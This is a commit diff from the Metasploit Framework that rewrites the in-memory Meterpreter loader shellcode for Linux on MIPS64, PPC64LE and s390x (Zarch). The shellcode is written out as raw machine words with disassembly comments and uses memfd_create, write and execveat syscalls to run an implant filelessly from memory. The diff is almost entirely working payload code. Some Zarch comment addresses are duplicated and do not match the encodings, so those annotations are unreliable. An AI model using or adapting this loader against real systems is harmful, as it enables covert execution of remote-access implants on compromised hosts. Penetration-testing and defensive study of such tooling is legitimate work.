Adds execveat for MIPS64, PPC64 and Zarch

msutovsky-r7 · msutovsky-r7 · commit 56c4506f82cb · 2025-05-12T11:57:43.000+02:00
diff --git a/lib/msf/core/payload/linux/mips64/meterpreter_loader.rb b/lib/msf/core/payload/linux/mips64/meterpreter_loader.rb
@@ -11,32 +11,31 @@ def in_memory_load(payload)
     size_l = size & 0x0000ffff
     in_memory_loader = [
 
-0x04110000, #0x1000:	bal	0x1004	0x04110000
-0x00000000, #0x1004:	nop		0x00000000
-0x03e02025, #0x1008:	move	$a0, $ra	0x03e02025
-0x27ff005c, #0x100c:	addiu	$ra, $ra, 0x5c	0x27ff005c
-0x2419fffe, #0x1010:	addiu	$t9, $zero, -2	0x2419fffe
-0x03202827, #0x1014:	not	$a1, $t9	0x03202827
-0x240214c2, #0x1018:	addiu	$v0, $zero, 0x14c2	0x240214c2
-0x0101010c, #0x101c:	syscall	0x40404	0x0101010c
-0x03e02825, #0x1020:	move	$a1, $ra	0x03e02825
-0x3c060017, #0x1024:	lui	$a2, 0x17	0x3c060017
-0x34c62fb8, #0x1028:	ori	$a2, $a2, 0x2fb8	0x34c62fb8
-0x00402025, #0x102c:	move	$a0, $v0	0x00402025
-0x0080c825, #0x1030:	move	$t9, $a0	0x0080c825
-0x24021389, #0x1034:	addiu	$v0, $zero, 0x1389	0x24021389
-0x0101010c, #0x1038:	syscall	0x40404	0x0101010c
-0x03202025, #0x103c:	move	$a0, $t9	0x03202025
-0xafa0fffc, #0x1040:	sw	$zero, -4($sp)	0xafa0fffc
-0x27bdfffc, #0x1044:	addiu	$sp, $sp, -4	0x27bdfffc
-0x03a02820, #0x1048:	add	$a1, $sp, $zero	0x03a02820
-0x00003025, #0x104c:	move	$a2, $zero	0x00003025
-0x00003825, #0x1050:	move	$a3, $zero	0x00003825
-0x24191000, #0x1054:	addiu	$t9, $zero, 0x1000	0x24191000
-0xafb90010, #0x1058:	sw	$t9, 0x10($sp)	0xafb90010
-0x240214c4, #0x105c:	addiu	$v0, $zero, 0x14c4	0x240214c4
-0x0101010c, #0x1060:	syscall	0x40404	0x0101010c
-
+          0x04110000, #0x1000:	bal	0x1004	0x04110000
+          0x00000000, #0x1004:	nop		0x00000000
+          0x03e02025, #0x1008:	move	$a0, $ra	0x03e02025
+          0x27ff005c, #0x100c:	addiu	$ra, $ra, 0x5c	0x27ff005c
+          0x2419fffe, #0x1010:	addiu	$t9, $zero, -2	0x2419fffe
+          0x03202827, #0x1014:	not	$a1, $t9	0x03202827
+          0x240214c2, #0x1018:	addiu	$v0, $zero, 0x14c2	0x240214c2
+          0x0101010c, #0x101c:	syscall	0x40404	0x0101010c
+          0x03e02825, #0x1020:	move	$a1, $ra	0x03e02825
+          (0x3c06 << 16 | size_h),  #   lui     a2,0x17
+          (0x34c6 << 16 | size_l),  #   ori     a2,a2,0x2fb8
+          0x00402025, #0x102c:	move	$a0, $v0	0x00402025
+          0x0080c825, #0x1030:	move	$t9, $a0	0x0080c825
+          0x24021389, #0x1034:	addiu	$v0, $zero, 0x1389	0x24021389
+          0x0101010c, #0x1038:	syscall	0x40404	0x0101010c
+          0x03202025, #0x103c:	move	$a0, $t9	0x03202025
+          0xafa0fffc, #0x1040:	sw	$zero, -4($sp)	0xafa0fffc
+          0x27bdfffc, #0x1044:	addiu	$sp, $sp, -4	0x27bdfffc
+          0x03a02820, #0x1048:	add	$a1, $sp, $zero	0x03a02820
+          0x00003025, #0x104c:	move	$a2, $zero	0x00003025
+          0x00003825, #0x1050:	move	$a3, $zero	0x00003825
+          0x24191000, #0x1054:	addiu	$t9, $zero, 0x1000	0x24191000
+          0xafb90010, #0x1058:	sw	$t9, 0x10($sp)	0xafb90010
+          0x240214c4, #0x105c:	addiu	$v0, $zero, 0x14c4	0x240214c4
+          0x0101010c #0x1060:	syscall	0x40404	0x0101010c
 
 
     ].pack('N*')
diff --git a/lib/msf/core/payload/linux/ppc64le/meterpreter_loader.rb b/lib/msf/core/payload/linux/ppc64le/meterpreter_loader.rb
@@ -8,31 +8,30 @@
 module Msf::Payload::Linux::Ppc64le::MeterpreterLoader
   def in_memory_load(payload)
     in_memory_loader = [
-      #use branch and branch with link to get address of payload data
-        0x5c000048, #0x1000:	b	0x105c	0x5c000048
-        0xa602e87d, #0x1004:	mflr	r15	0xa602e87d
-        0x0000c039, #0x1008:	li	r14, 0	0x0000c039
-        0x0000c195, #0x100c:	stwu	r14, 0(r1)	0x0000c195
-        0x780b237c, #0x1010:	mr	r3, r1	0x780b237c
-        0x00008038, #0x1014:	li	r4, 0	0x00008038
-        0x68010038, #0x1018:	li	r0, 0x168	0x68010038
-        0x02000044, #0x101c:	sc		0x02000044
-        0x787bf07d, #0x1020:	mr	r16, r15	0x787bf07d
-        0x781b717c, #0x1024:	mr	r17, r3	0x781b717c
-        0x0000af80, #0x1028:	lwz	r5, 0(r15)	0x0000af80
-        0x0400ef39, #0x102c:	addi	r15, r15, 4	0x0400ef39
-        0x787be47d, #0x1030:	mr	r4, r15	0x787be47d
-        0x04000038, #0x1034:	li	r0, 4	0x04000038
-        0x02000044, #0x1038:	sc		0x02000044
-        0x788b237e, #0x103c:	mr	r3, r17	0x788b237e
-        0x0000c195, #0x1040:	stwu	r14, 0(r1)	0x0000c195
-        0x780b247c, #0x1044:	mr	r4, r1	0x780b247c
-        0x7822857c, #0x1048:	xor	r5, r4, r4	0x7822857c
-        0x782aa67c, #0x104c:	xor	r6, r5, r5	0x782aa67c
-        0x0010e038, #0x1050:	li	r7, 0x1000	0x0010e038
-        0x6a010038, #0x1054:	li	r0, 0x16a	0x6a010038
-        0x02000044, #0x1058:	sc		0x02000044
-        0xa9ffff4b, #0x105c:	bl	0x1004	0xa9ffff4b
+        0x4800005c, #0x1000:	b	0x105c	0x4800005c
+        0x7de802a6, #0x1004:	mflr	r15	0x7de802a6
+        0x39c00000, #0x1008:	li	r14, 0	0x39c00000
+        0x95c10000, #0x100c:	stwu	r14, 0(r1)	0x95c10000
+        0x7c230b78, #0x1010:	mr	r3, r1	0x7c230b78
+        0x38800000, #0x1014:	li	r4, 0	0x38800000
+        0x38000168, #0x1018:	li	r0, 0x168	0x38000168
+        0x44000002, #0x101c:	sc		0x44000002
+        0x7df07b78, #0x1020:	mr	r16, r15	0x7df07b78
+        0x7c711b78, #0x1024:	mr	r17, r3	0x7c711b78
+        0x80af0000, #0x1028:	lwz	r5, 0(r15)	0x80af0000
+        0x39ef0004, #0x102c:	addi	r15, r15, 4	0x39ef0004
+        0x7de47b78, #0x1030:	mr	r4, r15	0x7de47b78
+        0x38000004, #0x1034:	li	r0, 4	0x38000004
+        0x44000002, #0x1038:	sc		0x44000002
+        0x7e238b78, #0x103c:	mr	r3, r17	0x7e238b78
+        0x95c10000, #0x1040:	stwu	r14, 0(r1)	0x95c10000
+        0x7c240b78, #0x1044:	mr	r4, r1	0x7c240b78
+        0x7c852278, #0x1048:	xor	r5, r4, r4	0x7c852278
+        0x7ca62a78, #0x104c:	xor	r6, r5, r5	0x7ca62a78
+        0x38e01000, #0x1050:	li	r7, 0x1000	0x38e01000
+        0x3800016a, #0x1054:	li	r0, 0x16a	0x3800016a
+        0x44000002, #0x1058:	sc		0x44000002
+        0x4bffffa9, #0x105c:	bl	0x1004	0x4bffffa9
         payload.length
     ].pack('V*')
     in_memory_loader
diff --git a/lib/msf/core/payload/linux/zarch/meterpreter_loader.rb b/lib/msf/core/payload/linux/zarch/meterpreter_loader.rb
@@ -7,51 +7,32 @@
 module Msf::Payload::Linux::Zarch::MeterpreterLoader
   def in_memory_load(payload)
     in_memory_loader = [
-      0x0d80a738,
-      0x00019200,
-      0xf0004120,
-      0xf000a719,
-      0x015e0a00,
-      0x18621744,
-      0x1848a758,
-      0x00ae1a45,
-      0x58404000,
-      0x17331838,
-      0xa75800b2,
-      0x1a350a04,
-      0x17339200,
-      0xf000a758,
-      0x00011bf5,
-      0x1876a758,
-      0x000a1766,
-      0x1d651846,
-      0xc2490000,
-      0x00304240,
-      0xf000a758,
-      0x00011bf5,
-      0xa7580000,
-      0x19754720,
-      0x803aa758,
-      0x000e1bf5,
-      0x922ff001,
-      0x9270f002,
-      0x9272f003,
-      0x926ff004,
-      0x9263f005,
-      0x922ff006,
-      0x9273f007,
-      0x9265f008,
-      0x926cf009,
-      0x9266f00a,
-      0x922ff00b,
-      0x9266f00c,
-      0x9264f00d,
-      0x922ff00e,
-      0x4120f001,
-      0xa7380000,
-      0xa7480000,
-      0x0a0b0707,
-      payload.length
+        0x17770d80, #0x1000:    basr    %r8, %r0    0x0d80
+        0xa7380001, #0x1002:    lhi %r3, 1  0xa7380001
+        0x9200f000, #0x1006:    mvi 0(%r15), 0  0x9200f000
+        0x4120f000, #0x100a:    la  %r2, 0(%r15)    0x4120f000
+        0xa719015e, #0x100e:    lghi    %r1, 0x15e  0xa719015e
+        0x17770a00, #0x1012:    svc 0   0x0a00
+        0x17771862, #0x1014:    lr  %r6, %r2    0x1862
+        0x17771744, #0x1016:    xr  %r4, %r4    0x1744
+        0xb9040048, #0x1000:	lgr	%r4, %r8	0xb9040048
+        0xa7580068, #0x1000:	lhi	%r5, 0x68	0xa7580068
+        0x17771a45, #0x101e:    ar  %r4, %r5    0x1a45
+        0x58404000, #0x1020:    l   %r4, 0(%r4) 0x58404000
+        0x17771733, #0x1024:    xr  %r3, %r3    0x1733
+        0xb9040038, #0x1000:	lgr	%r3, %r8	0xb9040038
+        0xa758006c, #0x1004:	lhi	%r5, 0x6c	0xa758006c
+        0x17771a35, #0x102c:    ar  %r3, %r5    0x1a35
+        0x17770a04, #0x102e:    svc 4   0x0a04
+        0x17771826, #0x1000:    lr  %r2, %r6    0x1826
+        0x9200f000, #0x1002:    mvi 0(%r15), 0  0x9200f000
+        0x4130f000, #0x1006:    la  %r3, 0(%r15)    0x4130f000
+        0xa7480000, #0x100a:    lhi %r4, 0  0xa7480000
+        0xa7580000, #0x100e:    lhi %r5, 0  0xa7580000
+        0xa7681000, #0x1000:	lhi	%r6, 0x1000	0xa7681000
+        0xa7190162, #0x101e:    lghi    %r1, 0x162  0xa7190162
+        0x17770a00, #0x1012:    svc 0   0x0a0
+        payload.length
     ].pack('N*')
     in_memory_loader
   end
